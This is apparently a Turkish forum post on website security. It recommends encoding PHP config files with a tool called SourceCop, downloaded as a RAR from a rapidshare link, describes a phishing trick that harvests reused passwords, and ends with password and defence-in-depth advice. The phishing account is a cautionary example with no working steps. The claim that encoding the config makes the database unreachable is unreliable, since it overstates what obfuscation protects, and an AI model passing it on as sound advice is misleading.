Config dosyalarınızı şifrelemek için SourceCop programını kullanın aşşağıda download linkini verdim programı açıp orda php yi seçin sonra C sürücünüzde bir klasör oluşturun içine config.php veya sitenizin ayar dosyasının adı neyse onu koyun sonra sourcecop programında Select Source Folder tuşuna basıp c sürücüsünde oluşturduğunuz klasörü seçin ve Encrypt tuşuna basın bukadar sonra oluşturduğunuz klasörün içindeki ayar dosyası ile birlikte scopbin klasörünü sitenizde uygun yere yükleyin bundan sonra sitenizin komple çekseler bile veritabanına ulaşamazlar. :)

http://rapidshare.com/files/1374119/SourceCop.v3.rar.html

Örnek bir saldırı tekniği;

Hacker, bilgisayar sistemine girmek istediği bir şirkete e-posta gönderir, e-postada, sitesine kayıt olan kişilerin çeşitli ödüller kazanacağından bahseder. Şirket yetkilisi hiç birşeyden haberi olmaksızın gelen e-postayı değerlendirmek ister. Bunun üzerine gerekli alanları doldururmaya başlar, bir kutucukta ise e-posta adresi ve şifre istenir. Şirket yetkilisi tıpkı yukarıda bahsettiğim tuzağa düşer ve kolaylık olsun diye kendi bilgisayar sisteminde kullandığı şifreyi yazar, bunun üzerine hacker kayıt işlemlerinde kullanılan kullanıcı adı ve şifreyi kullanıp hedef bilgisayar sistemlerine girmeye çalışır.

İnsan hayatında, çok basit gibi görülen bazı ayrıntıların bile ne denli büyük sorunlar çıkardığını bu örnekdede açıkca görüyoruz. Bu nedenle internette veya günlük yaşantımızda şifre seçimi konusunda biraz daha seçici davranmalıyız.

NOT: ”Güvenlik bilinci ve eğitimi hiç bir zaman kusursuz olmayacağı için derinlemesine bir savunma oluşturabilmek için mümkün olduğu kadar güvenlik teknolojisi kullanmaya çalışın. Bu, güvenlik önlemlerinin çalışanlardan çok, teknoloji tarafından alınmasıdır. Örneğin, işletim sistemi, çalışanlarının internetten dosya indirmesini ya da kısa ve kolay parolalar seçmesini engelleyecek şekilde ayarlanabilir.”